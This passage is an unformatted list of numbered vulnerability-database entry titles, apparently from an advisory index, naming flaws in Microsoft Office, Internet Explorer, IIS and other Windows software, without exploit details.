Microsoft Excel NAME Record Global Array Parsing Memory Corruption [50556] Microsoft Excel Malformed Object Record Parsing Memory Corruption [50555] Microsoft Excel Malformed Formula Parsing Memory Corruption [50488] Microsoft Multiple Products Crafted RTCP Receiver Report Packet Handling Remote DoS [50330] Microsoft Communicator Instant Message Emoticon Saturation Remote DoS [50320] Microsoft Communicator SIP INVITE Request Handling Session Saturation DoS [50302] Microsoft .NET Framework Strong Name Implementation DLL File Public Key Token Subversion Multiple Mechanism Authentication Bypass [50288] Apple iPhone Configuration Web Utility for Windows Traversal Arbitrary File Access [50279] Microsoft XML Core Services HTTP Request Header Field Cross-domain Session State Manipulation [50138] Microsoft SharePoint Host Name / Port Number Persistence HTML Document Same-origin Relationship Bypass XSS [50074] Cisco Unity Unspecified Microsoft API Dynamic UDP Port Packet Handling Remote DoS [50044] Microsoft IE Non-Blocking Space Character Visual Truncation Address Bar Spoofing [50043] Microsoft IE High-bit URL Encoded Character Address Bar Spoofing [49981] Symantec Backup Exec for Windows Server Data Management Protocol Unspecified Overflow [49980] Symantec Backup Exec for Windows Server Authentication Multiple Unspecified Issues [49926] Microsoft XML Core Services DTD Crafted XML Document Handling Cross-Domain Scripting Remote Information Disclosure [49900] Windows Mobile on HTC Hermes Password Auto-Completion Authentication Bypass [49899] Microsoft IIS iissext.dll Unspecified ActiveX SetPassword Method Remote Password Manipulation [49882] Opera on Windows file:// URI Handling Overflow [49781] Adobe Flash Player on Windows ActiveX Unspecified Information Disclosure [49743] Yosemite Backup on Windows ytwindtb.dll DtbClsLogin() Function Remote Overflow [49730] Microsoft IIS ActiveX (adsiis.dll) GetObject Method Remote DoS [49729] Microsoft Internet Authentication Service (IAS) Helper COM Component ActiveX (iashlpr.dll) PutProperty Method Remote DoS [49728] Microsoft IE Crafted URL-encoded String alert Function DoS [49592] Microsoft Office DjVu ActiveX (DjVu_ActiveX_MSOffice.dll) Multiple Property Overflow [49590] Microsoft Debug Diagnostic Tool DebugDiag ActiveX (CrashHangExt.dll) GetEntryPointForThread Method DoS [49586] Microsoft IE Mshtml.dll CDwnTaskExec::ThreadExec Function PNG File Handling DoS [49442] IBM Tivoli Storage Manager (TSM) Express for Microsoft SQL SQL CAD Data Protection (dsmcat.exe) Remote Overflow [49385] Microsoft ASP.NET Request Validation &lt [49384] Microsoft ASP.NET Request Validation &lt [49230] Microsoft Outlook Web Access (OWA) exchweb/bin/redir.asp URL Variable Arbitrary Site Redirect [49118] Microsoft IE HTML Object Handling Memory Corruption [49117] Microsoft IE componentFromPoint Unitialized Memory Corruption [49116] Microsoft IE Unspecified Cross-domain Information Disclosure [49115] Microsoft IE Unspecified Cross-domain Arbitrary Script Execution [49114] Microsoft IE Unspecified HTML Element Cross-Domain Code Execution [49113] Microsoft IE Window Location Property Cross-Domain Code Execution [49082] Microsoft PicturePusher ActiveX (PipPPush.DLL) Crafted PostURL Request Multiple Method Arbitrary File Upload [49078] Microsoft Excel Embedded Formula Parsing Arbitrary Code Execution [49077] Microsoft Excel Calendar Object Validation VBA Performance Cache Processing Arbitrary Code Execution [49076] Microsoft Excel BIFF File Malformed Object Handling Arbitrary Code Execution [49068] Microsoft Host Integration Server (HIS) SNA RPC Request Remote Overflow [49059] Microsoft IIS IPP Service Unspecified Remote Overflow [49052] Microsoft Office CDO Protocol (cdo:) Content-Disposition: Attachment Header XSS [48821] Microsoft Dynamics GP DPS Component DPS Message Remote Overflow [48820] Microsoft Dynamics GP DPM Component DPM Message Remote Overflow [48819] Microsoft Dynamics GP DPS Message Invalid Magic Number Remote DoS [48818] Microsoft IE Top Level Domain Cross-Domain Cookie Fixation [48564] Apple Mac OS X QuickLook Microsoft Office File Handling Memory Corruption [48243] ISC BIND for Windows UDP Client Handler Remote DoS [48220] Microsoft SQL Server SQLVDIRLib.SQLVDirControl ActiveX (Tools\Binn\sqlvdir.dll) Connect Method Overflow [48208] Novell eDirectory LDAP on Windows Unspecified Memory Corruption DoS [48206] Novell eDirectory NDS on Windows Unspecified Remote Memory Corruption [48149] IBM DB2 Universal Database on Windows DB2FMP Unspecified Issue [48034] Apple QuickTime on Windows PICT Image Handling Overflow [48032] Apple QuickTime on Windows PICT Image Handling Unspecified Arbitrary Code Execution [48020] Apple Bonjour for Windows mDNSResponder Bonjour API for Unicast DNS TransactionID/Port Randomness Prediction [48019] Apple Bonjour for Windows Bonjour Namespace Provider mDNSResponder Domain Name Label Handling DoS [48000] Microsoft Organization Chart orgchart.exe Crafted OPX File Handling DoS [47969] Microsoft Multiple Products GDI+ BMP Integer Calculation Overflow [47968] Microsoft Multiple Products GDI+ WMF Image Handling Overflow [47967] Microsoft Multiple Products GDI+ GIF Image Handling Arbitrary Code Execution [47966] Microsoft Multiple Products GDI+ EMF File Handling Memory Corruption [47965] Microsoft Multiple Products GDI+ VML Gradient Size Handling Overflow [47964] Microsoft Office OneNote Protocol Handler (onenote://) URI Handling Arbitrary Code Execution [47903] DiskCryptor on Windows BIOS Keyboard Buffer Local Password Disclosure [47856] Microsoft BitLocker BIOS Keyboard Buffer Local Password Disclosure [47475] Microsoft Visual Studio Masked Edit Control ActiveX (Msmask32.ocx) Mask Parameter Overflow [47447] RealVNC Windows Client vncviewer.exe Crafted Frame Buffer Update Packet Handling DoS [47419] Microsoft IE HTML Object Unspecified Memory Corruption [47418] Microsoft IE HTML Object Unspecified Memory Corruption [47417] Microsoft IE Object Handling Uninitialized Memory Corruption [47416] Microsoft IE HTML Document Objects Handling Memory Corruption [47415] Microsoft IE HTML Document Object Handling Memory Corruption [47414] Microsoft IE Print Preview HTML Component Handling Unspecified Arbitrary Code Execution [47413] Microsoft IE MHTML Protocol Handler Cross-Domain Information Disclosure [47410] Microsoft Office Excel connections.xml Password String Persistence [47409] Microsoft Office Excel Spreadsheet AxesSet Record Memory Corruption [47408] Microsoft Office Excel File FORMAT Record Array Index Handling Arbitrary Code Execution [47407] Microsoft Office Excel File COUNTRY Record Value Parsing Arbitrary Code Execution [47406] Microsoft PowerPoint Viewer Cstring Object Handling Memory Corruption [47405] Microsoft PowerPoint Viewer Picture Index Handling Memory Corruption [47404] Microsoft PowerPoint File List Value Handling Memory Corruption [47402] Microsoft Office Filters PICT File Handling Arbitrary Code Execution [47401] Microsoft Office Filters Encapsulated PostScript (EPS) File Handling Arbitrary Code Execution [47400] Microsoft Office BMPIMP32.FLT Filter BMP File Header Handling Arbitrary Code Execution [47398] Microsoft Office Filters PICT File bits_per_pixel Field Heap Corruption [47397] Microsoft Office WPGIMP32.FLT Filter WordPerfect Graphics (WPG) File Handling Arbitrary Code Execution [47299] Frisk F-PROT Antivirus Microsoft Office File Handling DoS [47004] Microsoft Crypto API S/MIME X.509 Certificate CRL Check Remote Information Disclosure [46935] Microsoft IE Pop Up Blocker Multiple Issues [46931] Microsoft Outlook/Express Unspecified URI Handling Arbitrary Command Injection [46914] Microsoft Word DOC File Handling Unspecified Arbitrary Code Execution [46827] Microsoft Visual Basic ActiveX (vb6skit.dll) fCreateShellLink Function Crafted lpstrLinkPath Argument Overflow [46780] Microsoft Outlook Web Access (OWA) HTML Parsing Unspecified XSS [46779] Microsoft Outlook Web Access (OWA) Data Validation Unspecified XSS [46773] Microsoft SQL Server Memory Page Reuse Information Disclosure [46772] Microsoft SQL Server Convert Function Overflow [46771] Microsoft SQL Server Stored Backup File Processing Memory Corruption Arbitrary Code Execution [46770] Microsoft SQL Server Crafted Insert Statement Overflow [46749] Microsoft Access Snapshot Viewer ActiveX (snapview.ocx) PrintSnapshot Method Arbitrary Code Execution [46723] Cisco VPN Client on Windows Dial-up Networking Dialog Local Privilege Escalation [46722] Apple Safari for Windows Crafted HTML Arbitrary File Download [46696] Opera for Windows Unspecified Arbitrary Code Execution [46676] Mozilla Multiple Browser Windows URL Shortcut Handling Cross-context Execution [46645] Microsoft Word DOC File Unordered List Handling Memory Corruption [46631] Microsoft IE Frame Location Handling Cross-frame Content Manipulation [46630] Microsoft IE location Window Object Handling XSS [46590] Avaya Message Storage Server (MSS) Admin Interface Windows Domain Parameter Arbitrary Command Execution [46501] Apple Safari for Windows URLACTION_SHELL_EXECUTE_HIGHRISK IE Zone Setting Restriction Bypass [46400] SurgeMail on Windows Unspecified Remote Issue (ZD-00000078) [46275] Sun Java on Windows jusched.exe Unspecified Overflow [46240] No-IP Windows Dynamic Update Client Registry Local Credentials Disclosure [46194] Novell iPrint Client for Windows ienipp.ocx ActiveX Multiple Variable Overflow [46084] Microsoft IE Request Header Handling Cross-domain Information Disclosure [46083] Microsoft IE HTML Object Handling Memory Corruption Arbitrary Code Execution [46065] Microsoft DirectX SAMI File Format Processing Arbitrary Code Execution [46064] Microsoft DirectX MJPEG Codec AVI/ASF File Processing Arbitrary Code Execution [45941] HP System Management Homepage (SMH) for Windows OpenSSL Version Regression [45906] Microsoft ISA Server SOCKS4 Proxy Empty Packet Cross Session Destination IP Disclosure [45826] Microsoft IE Local Zone Saved File URI XSS [45814] Microsoft IE Arbitrary Website Zone Addition Domain Supression DoS [45813] Microsoft IE URI Arbitrary Scheme Name XSS Filter Bypass [45806] Microsoft Register Server (REGSVR) Crafted DLL Handling Unspecified Issue [45583] Microsoft IIS w/ Visual Interdev Unspecified Authentication Bypass [45525] Microsoft IE Failed Connection DNS Pin Dropping Rebinding Weakness [45522] Symantec Veritas Backup Exec for Windows Unspecified Remote Issue [45517] Windows Mobile PC SMS Handler SMS Message Sender Field Spoofing [45442] Microsoft IE IObjectSafety Java Plug-in ActiveX COM Object Creation DoS [45441] Microsoft IE IObjectSafety CLSID_ApprenticeICW ActiveX Control COM Object Creation DoS [45440] Microsoft IE IObjectSafety SmartConnect Class ActiveX Control COM Object Creation DoS [45439] Microsoft IE IObjectSafety System Monitor Source Properties ActiveX Control COM Object Creation DoS [45438] Microsoft IE IObjectSafety Outlook Progress Ctl ActiveX Control COM Object Creation DoS [45437] Microsoft IE Location DOM Object Page Load Interruption Site/Certificate Spoofing [45436] Microsoft IE URI Unspecified Scheme Traversal Arbitrary File Access [45435] Microsoft IE file: URI Absolute Traversal Arbitrary File Access [45354] Stunnel on Windows Unspecified Local Privilege Escalation [45264] Microsoft Office Publisher File Format Unspecified Remote Code Execution [45262] Microsoft ISA Server Host Header Log File Content Injection [45260] Microsoft IE Malformed Table Element CSS Attribute Handling DoS [45259] Microsoft IE mshtml.dll Malformed IFRAME XML File / XSL Stylesheet Handling DoS [45248] Microsoft IE JavaScript onUnload Document Structure Modification DoS [45218] Microsoft Outlook Web Access Cache-Control Directive Information Caching Persistence [45185] Microsoft Baseline Security Analyzer (MBSA) Reboot Race Condition Weakness [45074] Microsoft IE Print Table of Links Cross-Zone Scripting [45033] Microsoft Publisher Object Handler Header Data Validation Arbitrary Code Execution [45032] Microsoft Word Document Malformed CSS Handling Memory Corruption Arbitrary Code Execution [45031] Microsoft Office RTF File Handling Object Parsing Arbitrary Code Execution [45028] Microsoft Malware Protection Engine File Parsing Disk-space Exhaustion DoS [45027] Microsoft Malware Protection Engine File Parsing Service DoS [45008] Microsoft Outlook E-mail Message Malformed Header / Body Separation Remote DoS [44979] Microsoft SQL Server Blank sa Password Set Weakness [44973] Microsoft IE DisableCachingOfSSLPages SSL Page Caching Persistence [44964] Apple QuickTime Player on Windows Crafted Media File Arbitrary Code Execution [44963] IBM DB2 Universal Database on Windows Multiple Function JAR File Handling Remote DoS [44959] Microsoft Office on Mac OS X Installation Permission Bypass [44938] Microsoft Office Open XML (OOXML) Document Metadata Field Modification Signature Weakness [44721] IBM DB2 Universal Database Windows Change Password Policy Bypass [44652] Microsoft HeartbeatCtl HRTBEAT.OCX ActiveX Unspecified Method Host Argument Overflow [44597] Oracle Application Server on Windows Crafted URI Remote DoS [44527] Oracle Application Server on Windows Installation Default Permission Weakness [44459] Microsoft Sharepoint Rich Text Editor Picture Source XSS [44458] Microsoft Works WkImgSrv.dll WksPictureInterface Property Remote DoS [44319] Microsoft Office Publisher Crafted PUB File Handling DoS [44318] Trend Micro ServerProtect for Windows (SpntSvc.exe) StRpcSrv.dll Arbitrary Remote Code Execution [44303] Microsoft IE body Tag Infinite Loop DoS [44212] Microsoft Project File Handling Unspecified Arbitrary Code Execution [44211] Microsoft Vbscript.dll VBScript Decoding Code Execution [44210] Microsoft Jscript.dll JScript Arbitrary Code Execution [44205] Microsoft IE Data Stream Handling Memory Corruption [44170] Microsoft Visio DXF File Handling Memory Validation Arbitrary Code Execution [44169] Microsoft Visio Object Header Data Handling Arbitrary Code Execution [44150] Microsoft Access Crafted MDB File Handling Overflow [44004] Apple QuickTime on Windows Movie Animation Codec Handling Overflow [44002] Apple QuickTime on Windows PICT Handling Clip opcode Parsing Overflow [43606] Microsoft IE XMLHttpRequest() Multiple Header Overwrite HTTP Response Splitting [43605] Microsoft IE Chunked Transfer-Encoding Request Smuggling [43602] FutureSoft TFTP Server 2000 for Windows UDP Request Handling Remote Overflow [43521] Microsoft IE CSS :visited Pseudo-class Browser History Disclosure [43471] Microsoft IE Digest Authentication username Attribute CRLF Injection [43464] Microsoft Jet Database Engine Word File Handling Unspecified Code Execution [43451] Microsoft IIS HTTP Request Smuggling [43325] Microsoft Atlas Framework JavaScript Object Notation (JSON) Crafted HTML Remote Data Disclosure [43314] Microsoft IE JavaScript Long String Regex Match Remote DoS [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption [43242] Novell GroupWise Windows Client API Shared Folder Security Bypass [43076] Acronis True Image Windows Agent Malformed Packet Remote DoS [43068] Microsoft Access MDB File Handling Unspecified Arbitrary Code Execution [42978] Double-Take for Windows username Field Remote Overflow [42977] Double-Take for Windows ospace/time/src\date.cpp Exception Remote DoS [42976] Double-Take for Windows Crafted Request CPU Consumption Remote DoS [42975] Double-Take for Windows Malformed Packet NULL Dereference Remote DoS [42974] Double-Take for Windows Crafted Packet Memory Allocation Error Remote DoS [42973] Double-Take for Windows Crafted Packet Remote Information Disclosure [42972] Double-Take for Windows Crafted Packet Function Recursion Remote DoS [42799] Microsoft IE URI Handling Arbitrary FTP Command Injection [42732] Microsoft Excel Macro Validation Unspecified Code Execution [42731] Microsoft Excel Conditional Formatting Value Unspecified Code Execution [42730] Microsoft Excel BIFF File Format Rich Text Tag Malformed Tag Memory Corruption [42725] Microsoft Excel XLS Malformed Formula Memory Corruption [42724] Microsoft Excel Style Record Handling Memory Corruption [42723] Microsoft Excel SLK File Import Unspecified Arbitrary Code Execution [42722] Microsoft Excel BIFF8 Spreadsheet DVAL Record Handling Arbitrary Code Execution [42712] Microsoft Office Web Components DataSource Page Handling Arbitrary Code Execution [42711] Microsoft Office Web Components URL Parsing Arbitrary Code Execution [42710] Microsoft Outlook mailto: URI Handling Arbitrary Command Execution [42709] Microsoft Office Unspecified Malformed Document Handling Memory Corruption [42708] Microsoft Office Excel Document (XLS) Cell Record Rebuilding Memory Corruption [42360] Symantec Backup Exec for Windows Servers (BEWS) PVATLCalendar.PVCalendar.1 ActiveX (pvcalendar.ocx) Save() Method Arbitrary File Manipulation [42358] Symantec Backup Exec for Windows Servers (BEWS) PVATLCalendar.PVCalendar.1 ActiveX (pvcalendar.ocx) Multiple Overflows [42329] Symantec Backup Exec for Windows Servers (BEWS) Unspecified Remote Issue [42193] VLC Media Player on Windows RTSP Data Handling Unspecified Remote Overflow [42152] Microsoft Silverlight ActiveX Unspecified Overflow [42058] Microsoft FrontPage CERN Image Map Dispatcher (htimage.exe) Arbitrary File Information Disclosure [41871] Mono on Windows System.Web StaticFileHandler.cs Crafted Request Source Code Disclosure [41775] PHP Component Object Model (COM) on Windows Multiple Restriction Bypass [41727] Windows Privacy Tray (WinPT) Crafted Key Installation Visual Truncation Weakness [41628] IBM Informix Storage Manager (ISM) Windows RPC Components XDR Library Multiple Unspecified Remote Overflows [41621] IBM Informix Dynamic Server (IDS) on Windows Unspecified SQ_ONASSIST Request Remote DoS [41468] Microsoft FoxPro ActiveX Web Page Parsing Unspecified Memory Corruption [41467] Microsoft IE Image Processing Argument Validation Unspecified Memory Corruption [41466] Microsoft IE animateMotion.by SVG Element by Property Memory Corruption [41465] Microsoft IE HTML Layout Rendering Unspecified Memory Corruption [41464] Microsoft Word Document Handling Unspecified Memory Corruption [41462] Microsoft Office Malformed Object Parsing Memory Corruption [41461] Microsoft Active Directory / ADAM Malformed LDAP Request Remote DoS [41460] Microsoft WebDAV Mini-Redirector Response Handling Arbitrary Code Execution [41459] Microsoft Works File Converter .wps File Multiple Field Handling Arbitrary Code Execution [41458] Microsoft Works File Converter .wps File Header Index Table Handling Arbitrary Code Execution [41457] Microsoft Works File Converter .wps Format Header Handling Arbitrary Code Execution [41456] Microsoft IIS File Change Handling Local Privilege Escalation [41447] Microsoft Office Publisher Memory Index Validation .pub File Handling Arbitrary Code Execution [41446] Microsoft Office Publisher .pub File Handling Arbitrary Code Execution [41445] Microsoft IIS ASP Web Page Input Unspecified Arbitrary Code Execution [41382] Microsoft IE OnKeyDown JavaScript htmlFor Attribute Keystroke Disclosure [41377] F-Secure Anti-Virus for Windows system32 Directory Crafted File Detection Bypass [41091] Microsoft IIS webhits.dll Hit-Highlighting Authentication Bypass [41080] Microsoft Visual Database Tools MSVDTDatabaseDesigner7 ActiveX (VDT70.DLL) NotSafe Function Arbitrary Code Execution [41063] Microsoft IIS ODBC Tool newdsn.exe Remote DSN Creation [41060] Microsoft .NET Unspecified XSS Filter Bypass [41057] Microsoft IIS w/ .NET MS-DOS Device Request Blacklist Bypass [41053] Microsoft Visual Basic vbp File Company Name Field Processing Overflow [41052] Microsoft Visual Basic vbp File Description Field Processing Overflow [41048] Microsoft IE Content-Disposition HTML File Handling XSS [41047] Microsoft IE mshtml Malformed HTML Tag DoS [41041] Microsoft IE Mouse Click self.resizeTo DoS [41040] Microsoft IE onclick Self Referencing Button Infinite Loop DoS [41036] Microsoft IE DLL Search Path Subversion Local Privilege Escalation [41035] Microsoft IE onload Localhost DoS [41026] Microsoft IE GET Request Overflow [41025] Microsoft IE Drag and Drop Arbitrary Program Execution [41024] Microsoft IE Cross Zone Domain Resolution Weakness [40882] Apple Safari on Windows Bookmark Title Overflow [40872] Cisco VPN Client on Windows Dial-up Networking cvpnd.exe Permission Weakness Local Privilege Escalation [40865] Symantec Backup Exec for Windows Servers (BEWS) Job Engine (bengine.exe) Crafted Packet Remote DoS [40735] Apple Mac OS X Microsoft Office Spotlight Importer XLS Handling Memory Corruption [40531] Microsoft Visual Basic DSR File Handling Remote Code Execution [40434] Apple Quicktime for Windows Crafted QTL File qtnext Field Remote Command Execution [40381] Microsoft Visual FoxPro VFP_OLE_Server ActiveX foxcommand Method Arbitrary Code Execution [40380] Microsoft Visual FoxPro ActiveX (vfp6r.dll) DoCmd Method Arbitrary Command Execution [40352] Microsoft Visual InterDev SLN File Long Project Line Arbitrary Code Execution [40344] Microsoft Excel Malformed Header File Handling Remote Code Execution [40271] phPay on Windows main.php config Parameter Traversal Local File Inclusion [40256] Windows NT FTP Server (WFTP) Explorer LIST Command Long Reply Arbitrary Remote Code Execution [40234] Microsoft Rich Textbox Control (RICHTX32.OCX) SaveFile Method Arbitrary File Overwrite [40125] Motorola Timbuktu Pro for Windows Scanner Function HELLO Response Packet Remote Overflow [40124] Motorola Timbuktu Pro for Windows Authentication Username Remote Overflow [40123] Motorola Timbuktu Pro for Windows Application Protocol Request Unspecified Remote Overflow [40121] Motorola Timbuktu Pro for Windows Send Request Traversal Arbitrary File Manipulation [40119] Subversion on Windows Filename Repository Filename Traversal Arbitrary File Overwrite [40118] TortoiseSVN on Windows Filename Traversal Arbitrary File Overwrite [40091] VMware Multiple Products Windows Search Path Subversion Local Privilege Escalation [39900] Microsoft Web Proxy Auto-Discovery (WPAD) Crafted DNS MitM Weakness [39754] Trend Micro ServerProtect for Windows (SpntSvc.exe) Notification.dll NTF_SetPagerNotifyConfig Function Remote Overflow [39753] Trend Micro ServerProtect for Windows (SpntSvc.exe) Eng50.dll Multiple Function Remote Overflow [39752] Trend Micro ServerProtect for Windows (SpntSvc.exe) Stcommon.dll Multiple Function Remote Overflow [39751] Trend Micro ServerProtect for Windows (SpntSvc.exe) StRpcSrv.dll Multiple Function Remote Overflow [39750] Trend Micro ServerProtect for Windows Agent Service RPCFN_CopyAUSrc Function Remote Overflow [39707] Toribash Server on Windows Malformed Command Remote DoS [39562] AMD ATI atidsmxx.sys on Windows Vista Local Privilege Escalation [39358] Ingres on Windows Persistent User Privilege Remote Privilege Escalation [39255] Windows Vista UACE Local Privilege Escalation [39250] X Windows (X11) Unspecified HTML Processing DoS [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure [39121] Microsoft IE DHTML Object Memory Corruption [39120] Microsoft IE Element Tag Uninitialized Memory Corruption [39119] Microsoft IE Object cloneNode / nodeValue Function Uninitialized Memory Corruption [39118] Microsoft IE Object setExpression Function Memory Corruption [38955] Microsoft IE history.length Variable History Disclosure [38954] Microsoft Excel Sheet Name Unspecified Code Execution [38953] Microsoft IE Document Variable Overwrite Same Origin Policy Bypass [38869] Apple Safari for Windows corefoundation.dll History Error Remote DoS [38866] Apple Safari for Windows Unspecified Memory Corruption DoS (crash #2) [38864] Apple Safari for Windows feed:// URL DoS [38572] Windows RSH daemon (rshd) Packet Processing Remote Overflow [38542] Apple Safari for Windows IFRAME SRC Arbitrary Command Execution [38541] Apple Safari for Windows Unspecified DHTML Manipulation Remote DoS [38497] Microsoft IE Page Transaction Race Condition Arbitrary Code Execution [38496] Microsoft Sysinternals DebugView Dbgv.sys Local Privilege Escalation [38495] Microsoft IE Outlook Express Address Book Activex DoS [38493] Microsoft IE HTML Popup Window (mshtml.dll) DoS [38488] Microsoft ISA Server File Extension Filter Bypass [38487] Microsoft Visual FoxPro ActiveX (FPOLE.OCX) FoxDoCmd Function Arbitrary Command Execution [38486] Microsoft Expression Media IVC File Cleartext Catalog Password Disclosure [38471] Microsoft Office MSODataSourceControl ActiveX DeleteRecordSourceIfUnused Method Overflow [38399] Microsoft SQL Server Enterprise Manager Distributed Management Objects OLE DLL ActiveX (sqldmo.dll) Start Method Arbitrary Code Execution [38212] Microsoft IE document.open() Function Address Bar Spoofing [38211] Microsoft IE with Netscape navigatorurl URI Cross-browser Command Execution [38018] Microsoft IE with Mozilla SeaMonkey Cross-browser Command Execution [38017] Microsoft IE with Mozilla Firefox Cross-browser Command Execution [37992] Atheros 802.11 Wireless Driver on Windows Management Frame Handling DoS [37817] Windows NT Message Compiler MC-filename Local Overflow [37764] Sun Java JDK / JRE on Windows Untrusted Application Arbitrary File Access [37638] Microsoft IE res:// URI Image Object Local File Enumeration [37636] Microsoft IE Crafted JavaScript for Loop Null Pointer DoS [37634] Microsoft Word Crafted Document Unspecified Resource Consumption DoS [37633] Microsoft Word wwlib.dll Crafted Document Overflow DoS [37632] Microsoft Word Unspecified Memory Corruption [37630] Microsoft SharePoint PATH_INFO (query string) XSS [37626] Microsoft IE Unspecified Address Bar Spoofing [37625] Microsoft IE File Download Queue Handling Use-After-Free Arbitrary Code Execution [37590] WIDCOMM Bluetooth for Windows (BTW) Traversal Arbitrary File Manipulation [37589] WIDCOMM Bluetooth for Windows (BTW) Remote Communication Interception (CarWhisperer) [37383] ZoneAlarm Pro Windows API Function Identifier Manipulation Local Policy Bypass [37375] Comodo Firewall Pro Windows API Function Identifier Manipulation Local Policy Bypass [37250] Sun Java System (SJS) Application Server on Windows Unspecified JSP Source Disclosure [37148] Microsoft TSAC ActiveX connect.asp Unknown XSS [37107] Microsoft Visual Studio VB To VSI Support Library ActiveX (VBTOVSI.DLL) SaveAs Method Arbitrary File Manipulation [37106] Microsoft Visual Studio ActiveX (PDWizard.ocx) Multiple Method Arbitrary Program Execution [37011] Nessus Windows GUI Unspecified XSS [36936] Microsoft Visual Basic VBP File Handling Overflow [36934] Microsoft Agent URL Handling Remote Code Execution [36605] Apple Safari windows.setTimeout Function XSS [36524] Credant Mobile Guardian Shield for Windows Cleartext Credential Disclosure [36400] Microsoft IE HTML FTP Credential Disclosure [36399] Microsoft DirectX Media SDK DXSurface.LivePicture.FlashPix.1 (DirectTransform FlashPix) ActiveX SourceUrl Property Overflow [36398] Microsoft IE FTP Unspecified Remote Memory Address Disclosure [36397] Microsoft IE Crafted CSS Unspecified Memory Corruption [36396] Microsoft IE ActiveX tblinf32.dll Unspecified Arbitrary Code Execution [36395] Microsoft IE ActiveX (pdwizard.ocx) Unspecified Memory Corruption [36394] Microsoft XML Core Services (MSXML) Multiple Object Handling Overflow [36389] Microsoft Virtual PC Guest Administrator Unspecified Local Privilege Escalation [36383] Microsoft Excel Workspace rtWnDesk Record Memory Corruption [36151] Microsoft DirectX RLE Compressed Targa Image Processing Overflow [36147] Microsoft IE Zone Domain Specification DoS [36142] Microsoft IE IDN Site Basic Authentication Status Bar Truncation Spoofing [36111] Symantec Backup Exec for Windows RPC Crafted ncacn_ip_tcp Request Remote Overflow [36105] Symantec LiveState for Windows shstart.exe Local Privilege Escalation [36089] PHP COM Extensions on Windows WScript.Shell COM Object safe_mode Bypass [36062] Mozilla Firefox on Windows Encoded IP Phishing Protection Bypass [36059] Caucho Resin on Windows Crafted MS-DOS Request DoS [36058] Caucho Resin on Windows \web-inf Traversal Arbitrary File Access [36057] Caucho Resin on Windows Encoded Space (%20) Request Path Disclosure [36041] Fullaspsite Asp Hosting Sitesi windows.asp kategori_id Variable [36034] Microsoft Office 2000 Controllo ActiveX (OUACTRL.OCX) HelpPopup Method Overflow [35959] Microsoft Excel Viewer WorkBook Workspace Designation Memory Corruption [35958] Microsoft Excel Multiple Worksheet Unspecified Memory Corruption [35957] Microsoft Excel Version Information Validation Crafted File Arbitrary Code Execution [35956] Microsoft .NET Framework Just In Time (JIT) Compiler Service Unspecified Arbitrary Code Execution [35955] Microsoft .NET Framework NULL Byte URL Arbitrary File Access [35954] Microsoft .NET Framework PE Loader Service Unspecified Arbitrary Code Execution [35953] Microsoft Office Publisher .pub Page Data Handling Arbitrary Code Execution [35950] Microsoft IIS IUSR_Machine Account Arbitrary Non-EXE Command Execution [35922] Mozilla Firefox on Windows resource:// %5C Encoded Traversal Arbitrary File Access [35763] Microsoft PowerPoint Unspecified Arbitrary Code Execution [35568] Microsoft IE Script Variable Length DoS [35517] Mbedthis AppWeb on Windows Mixed Case URL Unspecified Bypass [35353] Microsoft IE Speech API 4 Xlisten.dll / Xvoice.dll Memory Corruption [35352] Microsoft IE navcancl.htm res: URI Phishing [35351] Microsoft IE Unspecified Memory Corruption Arbitrary Code Execution [35350] Microsoft IE Multiple Language Pack Installation Race Condition Code Execution [35349] Microsoft IE Crafted CSS Tag Handling Memory Corruption [35348] Microsoft IE Urlmon.dll COM Object Instantiation Memory Corruption [35343] Microsoft Visio Document Handling Crafted Packed Object Arbitrary Code Execution [35342] Microsoft Visio Document Handling Crafted Version Number Arbitrary Code Execution [35269] Microsoft ASP .NET Framework Comment Enclosure Handling Request Weakness [34963] Microsoft IE CCRP BrowseDialog Server (ccrpbds6.dll) ActiveX Multiple Property DoS [34959] Microsoft Xbox 360 Hypervisor Syscall Bypass Arbitrary Code Access [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure [34830] Microsoft Outlook Recipient ActiveX (ole32.dll) Crafted HTML DoS [34489] Microsoft Office 2003 Malformed WMF File Handling DoS [34488] Microsoft Excel 2003 XLS Handling Corrupt Format DoS [34407] Adobe Acrobat Reader Plugin for Microsoft IE Microsoft.XMLHTTP ActiveX CLRF Injection [34404] Microsoft IE Media Service Component Arbitrary File Rewrite [34403] Microsoft IE HTML CMarkup Objects Unspecified Memory Corruption [34402] Microsoft IE HTML Objects Unspecified Memory Corruption [34401] Microsoft IE Property Method Handling Memory Corruption [34400] Microsoft IE Uninitialized Object Memory Corruption [34399] Microsoft IE COM Object Instantiation Memory Corruption (931768) [34397] Microsoft CAPICOM CAPICOM.Certificates ActiveX (CAPICOM.dll) Remote Code Execution [34396] Microsoft Office Crafted Drawing Object Arbitrary Code Execution [34395] Microsoft Excel Filter Record Handling Remote Code Execution [34394] Microsoft Office Excel Set Font Handling Remote Code Execution [34393] Microsoft Excel BIFF Record Named Graph Record Parsing Overflow [34392] Microsoft Exchange Server IMAP Literal Processing DoS [34391] Microsoft Exchange Server MIME Decoding Remote Code Execution [34390] Microsoft Exchange Server MODPROPS Malformed iCal DoS [34389] Microsoft Exchange Outlook Web Access (OWA) Attachment Script Injection [34388] Microsoft Word RTF Rich Text Properties Parsing Remote Code Execution [34387] Microsoft Word Data Array Handling Remote Code Execution [34386] Microsoft Word Malformed Drawing Object Arbitrary Code Execution [34385] Microsoft Word Macro Content Arbitrary Code Execution [34082] Plesk for Windows login_up.php3 locale_id Parameter Traversal Arbitrary File Access [34081] Plesk for Windows login.php3 locale_id Parameter Traversal Arbitrary File Access [34077] Microsoft IE navcancl.htm res: URI XSS [34007] Microsoft Content Management Server (CMS) Unspecified XSS [34006] Microsoft Content Management Server (CMS) Crafted HTTP Request Memory Corruption [33639] Microsoft Class Package Export Tool (clspack.exe) Long String Overflow [33638] Microsoft ISA Server IPv6 Filter Rule Bypass [33629] Microsoft IE Animated Cursor (.ani) Handling Arbitrary Command Execution [33627] Microsoft Vista Speech Recognition Web Page Arbitrary Command Execution [33626] Microsoft Visual C++ MSVCR80.DLL Time Functions Assertion Error [33457] Microsoft IIS Crafted TCP Connection Range Header DoS [33398] Windows XP msgina.dll Local Overflow [33271] Microsoft Word Crafted Frame CSRF [33270] Microsoft Word Unspecified Memory Corruption Arbitrary Code Execution [33196] Microsoft Word Unspecified Memory Corruption Arbitrary Code Execution (934232) [32697] Flip4Mac Windows Media Components WMV Parsing Memory Corruption [32630] Microsoft IE Key Press Event Focus Redirection [32627] Microsoft IE msxml3 Module Nested 